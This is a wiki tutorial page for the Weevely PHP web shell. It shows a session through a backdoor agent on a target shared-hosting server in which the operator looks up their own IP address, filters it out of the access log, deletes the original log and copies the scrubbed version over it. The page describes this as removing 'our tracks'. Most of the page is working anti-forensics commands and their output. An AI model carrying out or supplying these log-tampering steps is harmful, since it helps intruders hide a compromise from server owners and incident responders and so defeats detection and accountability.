Skip to content

Clean IP address from logs

Jump to bottom
epinna edited this page Sep 20, 2014 · 1 revision

This tutorial shows how to clean up the access traces from the logs in a server which which does not allow shell commands execution, provided that the target log file is writable by the user running our agent backdoor.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: file_grep (grep), system_info, file_rm (rm), file_cp (cp)

Session

In the example shared hosting server configuration, the HTTP access log file of the user's virtual host is kept in the ~/logs/ folder.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> ls
.
..
htdocs
logs
cpanel
.profile
cgi-bin
member@target:/home/member PHP> cd logs
member@target:/home/member/logs PHP> ls
.
..
access.log
member@target:/home/member/logs PHP>

Now run the system_info command to find out our IP address from which our connection came from.

member@target:/home/member/logs PHP> :system_info -info client_ip
174.122.136.104
member@target:/home/member/logs PHP>

Now run the grep command (an alias for the file_grep module) to find out if our IP address has been logged in the log file.

member@target:/home/member/logs PHP> grep access.log 174.122.136.104
174.122.136.104 - - [21/Apr/2015:20:37:04 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.co.uz/url?sa=t&rct=j&source=web&cd=136&ved=d7fQaxNTP&ei=qpG-lx-Uque6l97bG_EZfE&usg=FL237uTSYjAc8DC-d971rS4UUPyWV13nyK" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3"
174.122.136.104 - - [21/Apr/2015:20:34:01 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=200QawVTBiv_BPoQJdoQhA-yTa66mtGaEA" "Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)"
174.122.136.104 - - [21/Apr/2015:20:28:24 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.com.uy/url?sa=t&rct=j&source=web&cd=183&ved=DJY1U23wu&ei=GfRq0HsncZ7nn32louwyv0&usg=oYydfzk5nYywMujSFCTAmFvz3i3U7IYMDW" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)"

We can see the activities from our IP address have been logged. We can run again grep with the -v option to remove our IP from the log which we'll save to a temporary file.

member@target:/home/member/logs PHP> grep access.log -v 174.122.136.104 -output cleaned.log
member@target:/home/member/logs PHP>

Let's test if our IP has been actually removed

member@target:/home/member/logs PHP> grep cleaned.log 174.122.136.104
member@target:/home/member/logs PHP>

Now we can replace the cleaned.log with the real access.log.

member@target:/home/member/logs PHP> rm access.log
member@target:/home/member/logs PHP> cp cleaned.log access.log
member@target:/home/member/logs PHP> rm cleaned.log

Our tracks are now removed from the target log file.

Clone this wiki locally